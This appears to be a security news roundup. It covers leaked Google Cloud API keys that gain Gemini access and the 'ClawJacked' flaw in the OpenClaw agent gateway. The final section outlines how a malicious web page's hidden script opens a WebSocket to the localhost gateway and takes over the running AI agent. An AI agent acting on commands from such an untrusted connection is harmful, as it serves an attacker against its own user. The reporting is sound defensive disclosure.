Using a commercially developed artificial intelligence system in a classified US military operation represents a significant technological...
A recent security analysis has revealed that thousands of Google Cloud API keys available on the public internet could be misused to interact with Google’s Gemini artificial intelligence platform, creating both data exposure and financial risks.
Google Cloud API keys, often recognizable by the prefix “AIza,” are typically used to connect websites and applications to Google services and to track usage for billing. They are not meant to function as high-level authentication credentials. However, researchers from Truffle Security discovered that these keys can be leveraged to access Gemini-related endpoints once the Generative Language API is enabled within a Google Cloud project.
During their investigation, the firm identified nearly 3,000 active API keys embedded directly in publicly accessible client-side code, including JavaScript used to power website features such as maps and other Google integrations. According to security researcher Joe Leon, possession of a valid key may allow an attacker to retrieve stored files, read cached content, and generate large volumes of AI-driven requests that would be billed to the project owner. He further noted that these keys can now authenticate to Gemini services, even though they were not originally designed for that purpose.
The root of the problem lies in how permissions are applied when the Gemini API is activated. If a project owner enables the Generative Language API, all existing API keys tied to that project may automatically inherit access to Gemini endpoints. This includes keys that were previously embedded in publicly visible website code. Critically, there is no automatic alert notifying users that older keys have gained expanded capabilities.
As a result, attackers who routinely scan websites for exposed credentials could capture these keys and use them to access endpoints such as file storage or cached content interfaces. They could also submit repeated Gemini API requests, potentially generating substantial usage charges for victims through quota abuse.
The researchers also observed that when developers create a new API key within Google Cloud, the default configuration is set to “Unrestricted.” This means the key can interact with every enabled API within the same project, including Gemini, unless specific limitations are manually applied. In total, Truffle Security reported identifying 2,863 active keys accessible online, including one associated with a Google-related website.
Separately, Quokka published findings from a large-scale scan of 250,000 Android applications, uncovering more than 35,000 unique Google API keys embedded in mobile software. The company warned that beyond financial abuse through automated AI requests, organizations must consider broader implications. AI-enabled endpoints can interact with prompts, generated outputs, and integrated cloud services in ways that amplify the consequences of a compromised key.
Even in cases where direct customer records are not exposed, the combination of AI inference access, consumption of service quotas, and potential connectivity to other Google Cloud resources creates a substantially different risk profile than developers may have anticipated when treating API keys as simple billing identifiers.
Although the behavior was initially described as functioning as designed, Google later confirmed it had collaborated with researchers to mitigate the issue. A company spokesperson stated that measures have been implemented to detect and block leaked API keys attempting to access Gemini services. There is currently no confirmed evidence that the weakness has been exploited at scale. However, a recent online post described an incident in which a reportedly stolen API key generated over $82,000 in charges within a two-day period, compared to the account’s typical monthly expenditure of approximately $180.
The situation remains under review, and further updates are expected if additional details surface.
Security experts recommend that Google Cloud users audit their projects to determine whether AI-related APIs are enabled. If such services are active and associated API keys are publicly accessible through website code or open repositories, those keys should be rotated immediately. Researchers advise prioritizing older keys, as they are more likely to have been deployed publicly under earlier guidance suggesting limited risk.
Industry analysts emphasize that API security must be continuous. Changes in how APIs operate or what data they can access may not constitute traditional software vulnerabilities, yet they can materially increase exposure. As artificial intelligence becomes more tightly integrated with cloud services, organizations must move beyond periodic testing and instead monitor behavior, detect anomalies, and actively block suspicious activity to reduce evolving risk.
OpenClaw addressed a high-severity security threat that could have been exploited to allow a malicious site to link with a locally running AI agent and take control. According to the Oasis Security report, “Our vulnerability lives in the core system itself – no plugins, no marketplace, no user-installed extensions – just the bare OpenClaw gateway, running exactly as documented.”
The threat was codenamed ClawJacked by the experts. CVE-2026-25253 could have become a severe vulnerability chain that would have allowed any site to hack a person’s AI agent. The vulnerability existed in the main gateway of the software. As OpenClaw is built to trust connections from the user’s system, it could have allowed hackers easy access.
On a developer's laptop, OpenClaw is installed and operational. Its gateway, a local WebSocket server, is password-protected and connected to localhost. When the developer visits a website that is controlled by the attacker via social engineering or another method, the attack begins. According to the Oasis Report, “Any website you visit can open one to your localhost. Unlike regular HTTP requests, the browser doesn't block these cross-origin connections. So while you're browsing any website, JavaScript running on that page can silently open a connection to your local OpenClaw gateway. The user sees nothing.”
The research revealed a smart trick using WebSockets. Generally, your browser is active at preventing different websites from meddling with your local files. But WebSockets are an exception as they are built to stay “always-on” to send data simultaneously.
The OpenClaw gateway assumed that the connection must be safe because it comes from the user's own computer (localhost). But it is dangerous because if a developer running OpenClaw mistakenly visits a malicious website, a hidden script installed in the webpage can connect via WebSocket and interact directly with the AI tool in the background. The user will be clueless.